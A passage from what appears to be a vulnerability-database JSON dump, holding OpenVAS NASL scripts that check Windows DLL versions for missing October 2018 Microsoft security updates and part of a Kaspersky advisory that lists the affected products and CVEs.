
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814083\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8320\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8491\", \"CVE-2018-8493\",\n \"CVE-2018-8494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 10:22:26 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462926)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462926\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n 
- Windows Media Player improperly discloses file information.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights\n as the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012 R2\n\n Microsoft Windows 8.1 for 32-bit/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462926\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012R2:1, win8_1:1, win8_1x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"urlmon.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19155\"))\n{\n report = report_fixed_ver(file_checked:sysPath + 
\"\\urlmon.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19155\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462919", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814080", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462919)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462919)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814080\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8494\", \"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\",\n \"CVE-2018-8320\", \"CVE-2018-8329\", \"CVE-2018-8330\", \"CVE-2018-8333\",\n \"CVE-2018-8411\", \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\",\n \"CVE-2018-8460\", \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\",\n \"CVE-2018-8484\", \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8491\",\n \"CVE-2018-8492\", \"CVE-2018-8493\", \"CVE-2018-8505\", \"CVE-2018-8506\",\n \"CVE-2018-8509\", \"CVE-2018-8530\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 09:28:04 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462919)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462919\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver 
improperly handles objects in memory.\n\n - Windows Subsystem for Linux fails to properly handle objects in memory.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An input validation error in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Microsoft Windows Codecs Library improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights\n as the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1803 for 32-bit Systems\n\n Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462919\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.344\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.344\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:14", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462918", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814079", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814079", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462918)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462918)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# 
Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814079\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8494\", \"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\",\n \"CVE-2018-8320\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\",\n \"CVE-2018-8492\", \"CVE-2018-8493\", \"CVE-2018-8505\", \"CVE-2018-8506\",\n \"CVE-2018-8509\", \"CVE-2018-8512\", \"CVE-2018-8530\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 09:07:36 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462918)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to 
Microsoft KB4462918\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Edge Content Security Policy (CSP) fails to properly validate certain specially\n crafted documents.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An improper input validation in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\n\n - Microsoft Windows Codecs Library improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security restrictions, gain the same user\n rights as the current user, determine the presence of files on disk, escalate\n privileges and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 Version 1709 
for 32-bit Systems\n\n Windows 10 Version 1709 for 64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462918\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.725\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.725\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462917", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814081", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462917)", "type": "openvas", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462917)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814081\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\", \"CVE-2018-8505\",\n \"CVE-2018-8320\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\",\n \"CVE-2018-8492\", \"CVE-2018-8493\", \"CVE-2018-8494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 09:48:26 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462917)\");\n\n script_tag(name:\"summary\", 
value:\"This host is missing a critical security\n update according to Microsoft KB4462917\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An input validation error in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Chakra scripting engine handles objects in memory in Microsoft Edge.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights\n as the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1607 x32/x64\n\n Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462917\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2550\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2550\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462937", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814082", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462937)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462937)\n#\n# Authors:\n# Rinu Kuriakose 
<krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814082\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8495\", \"CVE-2018-8497\", \"CVE-2018-8503\", \"CVE-2018-8505\",\n \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\", \"CVE-2018-8413\",\n \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\", \"CVE-2018-8472\",\n \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\", \"CVE-2018-8486\",\n \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\", \"CVE-2018-8492\",\n \"CVE-2018-8493\", \"CVE-2018-8494\", \"CVE-2018-8512\", \"CVE-2018-8530\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 10:00:23 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462937)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462937\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Media Player improperly discloses file information.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Microsoft Edge improperly handles requests of different origins.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Edge Content Security Policy (CSP) fails to properly validate certain specially\n crafted documents.\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows Kernel improperly handles objects in memory.\n\n - Windows Shell improperly handles URIs.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - An input validation error in Device Guard.\n\n - Filter Manager improperly handles objects in memory.\n\n\n - Windows kernel improperly handles objects in memory.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, bypass security restrictions, gain the same user rights as\n the current user, obtain information to further compromise the user's system,\n improperly discloses file information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462937\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1386\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1386\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:43", "bulletinFamily": "info", "description": "### *Detect date*:\n10/09/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to bypass security restrictions, write local files, gain privileges, execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nMicrosoft Excel Viewer 2007 Service Pack 3 \nMicrosoft Office 2016 for Mac \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft Office Compatibility Pack Service Pack 3 \nMicrosoft Office Word Viewer \nMicrosoft PowerPoint Viewer 2007 \nOffice 365 ProPlus for 32-bit Systems \nOffice 365 ProPlus for 64-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for 64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows 
Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server 2019 \nWindows Server 2019 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nWindows Server, version 1803 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8320](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8320>)4.3Critical \n[CVE-2018-8333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8333>)7.0Critical \n[CVE-2018-8423](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8423>)7.8Critical \n[CVE-2018-8432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8432>)5.0Critical \n[CVE-2018-8486](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8486>)4.7Critical \n[CVE-2018-8330](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8330>)5.5Critical \n[CVE-2018-8493](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8493>)7.5Critical \n[CVE-2018-8472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8472>)5.5Critical \n[CVE-2018-8492](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8492>)5.3Critical \n[CVE-2018-8481](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8481>)3.1Critical 